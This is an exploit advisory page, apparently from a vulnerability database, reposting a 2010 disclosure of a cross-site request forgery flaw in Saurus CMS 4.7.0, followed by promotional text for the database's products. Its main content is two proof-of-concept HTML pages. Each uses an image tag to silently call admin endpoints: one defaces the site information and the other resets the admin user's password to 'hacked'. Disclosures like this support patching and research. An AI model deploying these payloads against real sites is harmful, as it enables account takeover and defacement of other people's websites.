Lucene search
K

Saurus CMS 4.7.0 Cross Site Request Forgery

🗓️ 17 Aug 2010 00:00:00Reported by Fady Mohamed OsmanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Saurus CMS 4.7.0 Cross Site Request Forgery allows hacker to change user password and website informatio

Code
`# Author: Fady Mohammed Osman (cute hacker)  
# Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz  
# Version: 4.7.0  
# Tested on: Ubuntu 10.04  
# CVE : [Not available]  
# This vulnerability allows a malicious hacker to change password of a user  
and also it allows changing the website information.  
  
PoC 1:  
  
<html>  
<head><title>Saurus CSRF : Change site information</title></head>  
<body>  
<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">  
</body>  
</html>  
  
PoC 2:  
  
<html>  
<head><title>Saurus CSRF : Change user's password</title></head>  
<body>  
<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation